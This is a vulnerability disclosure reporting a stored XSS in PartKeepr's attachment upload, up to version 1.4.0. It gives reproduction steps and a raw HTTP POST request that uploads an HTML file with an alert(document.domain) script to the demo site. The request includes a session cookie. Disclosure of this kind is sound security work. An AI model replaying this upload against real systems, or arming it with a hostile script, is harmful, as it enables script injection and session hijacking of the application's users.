XSS in [demo.partkeepr.org]

[Retr02332]

Bug description

In PartKeepr versions up to and including 1.4.0, the attachment upload functionality allows an authenticated remote attacker to achieve an XSS on the application by uploading an HTML file.

Steps to reproduce

1. Go to 'Add Part'.
2. Click on 'Attachments'.
3. Click on 'Add'.
4. Loads a malicious HTML file (containing JS)
5. Click on 'Upload'.
6. Click on the uploaded file to download it and you will see how the JS previously defined in the malicious HTML file is executed.

Expected behavior

That there are controls and validations on the types of files (as well as their content) that are uploaded to the server.

Observed behavior

An authenticated remote attacker can upload malicious HTML files to exploit an XSS.

Exploit

POST /api/temp_uploaded_files/upload HTTP/1.1
Host: demo.partkeepr.org
Cookie: PHPSESSID=cgvo3rp0us5i3pncs0tff67h0q
User-Agent: SOMETHING
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11627532643971092785189279811
Content-Length: 407
Origin: https://demo.partkeepr.org
Dnt: 1
Referer: https://demo.partkeepr.org/
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

-----------------------------11627532643971092785189279811
Content-Disposition: form-data; name="url"


-----------------------------11627532643971092785189279811
Content-Disposition: form-data; name="userfile"; filename="exploit.html"
Content-Type: text/html

<script type="text/javascript">
    alert(document.domain);
</script>

-----------------------------11627532643971092785189279811--

Screenshots

System Information

• PartKeepr Version: 1.4.0
• Operating System: LInux
• Web Server: Apache
• PHP Version: 7.4
• Database and version: Mysql
• Reproducible on the demo system: Yes

Best regards,
@Retr02332